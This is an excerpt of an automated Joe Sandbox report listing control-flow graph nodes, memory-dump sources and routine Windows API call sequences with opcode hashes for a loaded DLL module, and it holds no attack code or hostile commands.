                                        control_flow_graph 276 6fe260f0-6fe26139 CreateFileW 277 6fe261de-6fe26780 276->277 278 6fe2613f-6fe267e4 276->278 284 6fe25e23-6fe25e3c 278->284 285 6fe25eba-6fe25f0c GlobalAlloc 278->285 287 6fe25e40-6fe25e4e 284->287 288 6fe25f12-6fe25f2b 285->288 289 6fe25fad 285->289 293 6fe25ea3 287->293 294 6fe25e50 287->294 291 6fe25f2f-6fe25f3d 288->291 290 6fe25faf-6fe25fce 289->290 300 6fe25fd0 290->300 301 6fe25fe7-6fe25fea 290->301 297 6fe25f92 291->297 298 6fe25f3f 291->298 295 6fe25ea5-6fe25ea9 293->295 299 6fe25e52-6fe25e58 294->299 303 6fe267c3-6fe267dc 295->303 304 6fe25eaf-6fe25eb4 295->304 302 6fe25f94-6fe25f98 297->302 305 6fe25f41-6fe25f47 298->305 299->299 306 6fe25e5a-6fe25e5c 299->306 307 6fe25fd2-6fe25fe5 300->307 308 6fe25ffe-6fe26038 301->308 309 6fe25fec 301->309 310 6fe267a5-6fe267be 302->310 311 6fe25f9e-6fe25fa3 302->311 304->287 313 6fe25eb6 304->313 305->305 314 6fe25f49-6fe25f4b 305->314 306->293 315 6fe25e5e-6fe25e64 306->315 307->301 307->307 317 6fe260d9 308->317 318 6fe2603e-6fe26057 308->318 316 6fe25fee-6fe25ffc 309->316 310->290 311->291 319 6fe25fa5-6fe25fa9 311->319 313->285 314->297 320 6fe25f4d-6fe25f53 314->320 321 6fe266aa-6fe266af 315->321 322 6fe25e6a-6fe25e6e 315->322 316->308 316->316 324 6fe260db-6fe260ef 317->324 325 6fe2605b-6fe26069 318->325 319->289 327 6fe266b4 320->327 328 6fe25f59-6fe25f5d 320->328 326 6fe25e90-6fe25e95 321->326 323 6fe25e70-6fe25e86 322->323 323->323 330 6fe25e88-6fe25e8c 323->330 332 6fe2606b 325->332 333 6fe260be 325->333 326->295 331 6fe25e97-6fe25ea1 326->331 334 6fe266be 327->334 329 6fe25f5f-6fe25f75 328->329 329->329 335 6fe25f77-6fe25f84 329->335 330->326 331->295 336 6fe2606d-6fe26073 332->336 337 6fe260c0-6fe260c4 333->337 339 6fe26788-6fe267a0 334->339 335->302 340 6fe25f86-6fe25f90 335->340 336->336 341 6fe26075-6fe26077 336->341 338 6fe260ca-6fe260cf 337->338 337->339 338->325 342 6fe260d1-6fe260d5 338->342 339->324 340->302 341->333 343 6fe26079-6fe2607f 341->343 342->317 343->334 344 6fe26085-6fe26089 343->344 345 6fe2608b-6fe260a1 344->345 345->345 346 6fe260a3-6fe260b0 345->346 346->337 347 6fe260b2-6fe260bc 346->347 347->337
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FE260F6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 0a9ca1ffb8735f66016f5abe9267b3b11b7d485bb87bcddff6fd61522bf5262c
                                        • Instruction ID: 6ddcab253238e0618b8695f76b543e97273ccd3c74e5caa624c776bb7623cdf2
                                        • Opcode Fuzzy Hash: 0a9ca1ffb8735f66016f5abe9267b3b11b7d485bb87bcddff6fd61522bf5262c
                                        • Instruction Fuzzy Hash: B401FF709087019FC718CF4AC890906FBE5FFC9314F15856DA84897316D735E851CF85

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 348 6fe3a6f4-6fe3a716 HeapCreate 349 6fe3a71a-6fe3a723 348->349 350 6fe3a718-6fe3a719 348->350
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FE34776,00000001,?,?,?,6FE348EF,?,?,?,6FE4E848,0000000C,6FE349AA), ref: 6FE3A709
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: db5bc68dd61cb59cb8abcdab89aceaf75f8d6a9cce5e7d12f7b9f3199ea919dd
                                        • Instruction ID: 51f705d757abf6124c0782b1ed067f2e49b9c9874e590e204d6261a92fe33ba7
                                        • Opcode Fuzzy Hash: db5bc68dd61cb59cb8abcdab89aceaf75f8d6a9cce5e7d12f7b9f3199ea919dd
                                        • Instruction Fuzzy Hash: FBD02E329A87449AEF009E705C087263FEC93827AAF204436F80DC6180E570D2A0CA00
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FE27498
                                        • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FE276D5,?,00000000,?,00000000,00000104,00000000,?,6FE4BEF4,00000000), ref: 6FE274D6
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FE27546
                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FE2756D
                                        • CharUpperW.USER32(00000000), ref: 6FE275A0
                                        • FindFirstFileW.KERNEL32(?,?), ref: 6FE275BC
                                        • FindClose.KERNEL32(00000000), ref: 6FE275C8
                                        • lstrlenW.KERNEL32(?), ref: 6FE275E6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                        • String ID:
                                        • API String ID: 624941980-0
                                        • Opcode ID: 6e7b290f63bb2a8605ee10be02830394b395a27ab8feb5ebf3c2c9e39a77be3d
                                        • Instruction ID: 84a82b40a20dd358a8c8f74ee1cb1dd140557e33646bf92699a8884de30dfc22
                                        • Opcode Fuzzy Hash: 6e7b290f63bb2a8605ee10be02830394b395a27ab8feb5ebf3c2c9e39a77be3d
                                        • Instruction Fuzzy Hash: CD4186719086269BDF14AF64CC9CBAE7FB8AF12318F2002DDE91991190FB359B95CF50
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6FE37C6C
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FE37C81
                                        • UnhandledExceptionFilter.KERNEL32(6FE4A4B8), ref: 6FE37C8C
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6FE37CA8
                                        • TerminateProcess.KERNEL32(00000000), ref: 6FE37CAF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 54bcfd7afec5669bce47a94433405906e703c7ae2fdc9b4c017a2d840211903c
                                        • Instruction ID: bd80223d68529e3dc61d736f1fd350bb7c9dec19aef15a0505fce58e7658eb17
                                        • Opcode Fuzzy Hash: 54bcfd7afec5669bce47a94433405906e703c7ae2fdc9b4c017a2d840211903c
                                        • Instruction Fuzzy Hash: 4221CEB9816B04DFDF48DF59C9496483FB4BB8B338F60001AE50886390D7B255B5CF42
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FE289FC
                                        • __snwprintf_s.LIBCMT ref: 6FE28A2E
                                        • LoadLibraryW.KERNEL32(?), ref: 6FE28A69
                                          • Part of subcall function 6FE35348: __getptd_noexit.LIBCMT ref: 6FE35348
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                        • String ID: LOC
                                        • API String ID: 3175857669-519433814
                                        • Opcode ID: ce46915d2a54fa5f28ce5204614a06970ec71db3da959b1bd5c26dc660b88a4e
                                        • Instruction ID: 84b788e832060a0a87689be6ce2db00cb420f328892526218af7a9ab3031a72d
                                        • Opcode Fuzzy Hash: ce46915d2a54fa5f28ce5204614a06970ec71db3da959b1bd5c26dc660b88a4e
                                        • Instruction Fuzzy Hash: 3811A8B2E55314AADB10AB78CC48BAD7FECAB42358F30016AE114971D0EF749B05D7A1
                                        APIs
                                          • Part of subcall function 6FE32C57: GetWindowLongW.USER32(?,000000F0), ref: 6FE32C62
                                        • GetKeyState.USER32(00000010), ref: 6FE30514
                                        • GetKeyState.USER32(00000011), ref: 6FE3051D
                                        • GetKeyState.USER32(00000012), ref: 6FE30526
                                        • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FE3053C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: State$LongMessageSendWindow
                                        • String ID:
                                        • API String ID: 1063413437-0
                                        • Opcode ID: 53d1b2d42fc24cc90a976e00a004f6ab2b28ada57c823da19675336ac7b97120
                                        • Instruction ID: ecd1b400d7d5ba7af243a9adee348b5a7f7afc8f5f47f30ac989704af7809d62
                                        • Opcode Fuzzy Hash: 53d1b2d42fc24cc90a976e00a004f6ab2b28ada57c823da19675336ac7b97120
                                        • Instruction Fuzzy Hash: 7AF0E937F403AFB5EA2025754C09FFA0D254F81BFCF20143A6745AA1C0CEA0C502D6B0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2019a6441ab93e903ff8fd0e5187873eece7cec4e89724a1c168e2e87e08c612
                                        • Instruction ID: 9313c31e52e7e599f5949e63af960237460a7432c8582eefeab52d6b3f97b5e4
                                        • Opcode Fuzzy Hash: 2019a6441ab93e903ff8fd0e5187873eece7cec4e89724a1c168e2e87e08c612
                                        • Instruction Fuzzy Hash: 9CF06239904208AADF116F75CD049DA3FEAAF12754F54C015FA1984050EB30D656DB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd48d43933c838637bf7aace1212e5b1547043550ba7a9064d12ab8c80de7ac9
                                        • Instruction ID: 47c496f77901cbdaadfec130f964e113e8dbc923be7abc75f9351d6e16952516
                                        • Opcode Fuzzy Hash: dd48d43933c838637bf7aace1212e5b1547043550ba7a9064d12ab8c80de7ac9
                                        • Instruction Fuzzy Hash: C5316A75A087058BC724CF59CA8062ABBE2FFC9718F66852DD88857305EB30F855CB81
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FE28BE9
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FE28EB7,?,?), ref: 6FE28C19
                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FE28C2D
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C69
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C77
                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FE28C94
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FE28CBF
                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FE28CC8
                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FE28CE1
                                        • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FE28CFE
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FE28D31
                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FE28D3A
                                        • GetModuleFileNameW.KERNEL32(6FE20000,?,00000105), ref: 6FE28D7F
                                        • _memset.LIBCMT ref: 6FE28D9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                        • API String ID: 3537336938-2299501126
                                        • Opcode ID: 81c5720f7fdc6933053d61f0b47888968ba790ce56e34c3176c0c74ab8fa2eec
                                        • Instruction ID: 8bd5ca5180db3c5aac95efef57796de8cde0c04dec2f9484d37c51f62dabdb9e
                                        • Opcode Fuzzy Hash: 81c5720f7fdc6933053d61f0b47888968ba790ce56e34c3176c0c74ab8fa2eec
                                        • Instruction Fuzzy Hash: FD511C71D152299ACB60EFA5DC887ADBAF4EF58314F2001DBA448E3280EB749F85CF55
                                        APIs
                                        • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75A44A40,6FE2DE36,?,?,?,?,?,?,?,6FE2FCC6,00000000,00000002,00000028), ref: 6FE2DCF9
                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FE2DD15
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FE2DD2A
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FE2DD3B
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FE2DD4C
                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FE2DD5D
                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FE2DD6E
                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FE2DD8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                        • API String ID: 667068680-2451437823
                                        • Opcode ID: 025313e343b16878fd305464fbbf22c7b1b66a35510279697a8e3edf7048670c
                                        • Instruction ID: afb44c7a1874c17c9ef82e51a0e34bbfdec894cc597eeac577852d0b94b14836
                                        • Opcode Fuzzy Hash: 025313e343b16878fd305464fbbf22c7b1b66a35510279697a8e3edf7048670c
                                        • Instruction Fuzzy Hash: 2F21A4758189619FCB146F7DE9D446E7FE5BB4B129334663FD201E2208D7729071DB20
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FE319B8
                                          • Part of subcall function 6FE2C050: __EH_prolog3.LIBCMT ref: 6FE2C057
                                        • CallNextHookEx.USER32(?,?,?,?), ref: 6FE319F8
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        • _memset.LIBCMT ref: 6FE31A51
                                        • GetClassLongW.USER32(?,000000E0), ref: 6FE31A85
                                        • SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FE31ADA
                                        • GetClassNameW.USER32(?,?,00000100), ref: 6FE31B20
                                        • GetWindowLongW.USER32(?,000000FC), ref: 6FE31B46
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FE31B5D
                                        • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FE31B6F
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FE31B77
                                        • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FE31B86
                                        • SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FE31B94
                                        • CallNextHookEx.USER32(?,00000003,?,?), ref: 6FE31BA6
                                        • UnhookWindowsHookEx.USER32(?), ref: 6FE31BBA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
                                        • String ID: #32768$AfxOldWndProc423
                                        • API String ID: 4265692241-2141921550
                                        • Opcode ID: cd4e678a521bf35d9124c9b2af7bf7ae7875155c6b37ff8e226986318306ba22
                                        • Instruction ID: 8f54b19def7455a045ccf254793f9073d060706c1af2a24aa7d76eb9790a0bad
                                        • Opcode Fuzzy Hash: cd4e678a521bf35d9124c9b2af7bf7ae7875155c6b37ff8e226986318306ba22
                                        • Instruction Fuzzy Hash: 9D51A432D44735EBDB11AF64CC4CB9A7FB8BF06365F20119DF40996290EB349A91CBA1
                                        APIs
                                          • Part of subcall function 6FE32C57: GetWindowLongW.USER32(?,000000F0), ref: 6FE32C62
                                        • GetParent.USER32(?), ref: 6FE2FC05
                                        • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FE2FC28
                                        • GetWindowRect.USER32(?,?), ref: 6FE2FC42
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 6FE2FC58
                                        • CopyRect.USER32(?,?), ref: 6FE2FCA5
                                        • CopyRect.USER32(?,?), ref: 6FE2FCAF
                                        • GetWindowRect.USER32(00000000,?), ref: 6FE2FCB8
                                          • Part of subcall function 6FE2DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FE2DED6
                                        • CopyRect.USER32(?,?), ref: 6FE2FCD4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                                        • String ID: (
                                        • API String ID: 1385303425-3887548279
                                        • Opcode ID: 521605ec799525d9f2eb099972da7151a21af7579c41df660b65dc0689b47b46
                                        • Instruction ID: b80b138c5cd37f687eb3d9f9ebf937e0524ab2a999096b21b82ea9aaf6e62b50
                                        • Opcode Fuzzy Hash: 521605ec799525d9f2eb099972da7151a21af7579c41df660b65dc0689b47b46
                                        • Instruction Fuzzy Hash: BE516172A04619ABDB00DBB8CD85AEE7FB9AF49314F250119E915F7280EB34E905CB94
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FE4E928,0000000C,6FE3A25A,00000000,00000000), ref: 6FE3A131
                                        • __crt_waiting_on_module_handle.LIBCMT ref: 6FE3A13C
                                          • Part of subcall function 6FE35BCF: Sleep.KERNEL32(000003E8,00000000,?,6FE3A082,KERNEL32.DLL,?,6FE3A0CE), ref: 6FE35BDB
                                          • Part of subcall function 6FE35BCF: GetModuleHandleW.KERNEL32(6FE4C168,?,6FE3A082,KERNEL32.DLL,?,6FE3A0CE), ref: 6FE35BE4
                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FE3A165
                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 6FE3A175
                                        • __lock.LIBCMT ref: 6FE3A197
                                        • InterlockedIncrement.KERNEL32(6FE28ADA), ref: 6FE3A1A4
                                        • __lock.LIBCMT ref: 6FE3A1B8
                                        • ___addlocaleref.LIBCMT ref: 6FE3A1D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                        • String ID: $o$DecodePointer$EncodePointer$KERNEL32.DLL
                                        • API String ID: 1028249917-3531221583
                                        • Opcode ID: 9b7e48f0e0e708c5c7fc9342c8e3b12adba4b5359dcab47cfa636f9bc0510ceb
                                        • Instruction ID: b04072ded9c45aa256647c55bf8be7c5b46fa3538f8bf5a0501b3a36cd90519b
                                        • Opcode Fuzzy Hash: 9b7e48f0e0e708c5c7fc9342c8e3b12adba4b5359dcab47cfa636f9bc0510ceb
                                        • Instruction Fuzzy Hash: 0B11A2B2844B119FDB109F79D808B5EBFE0AF45728F30451ED49A97390CB34AA81DF54
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FE28503
                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FE28520
                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FE2852D
                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FE2853A
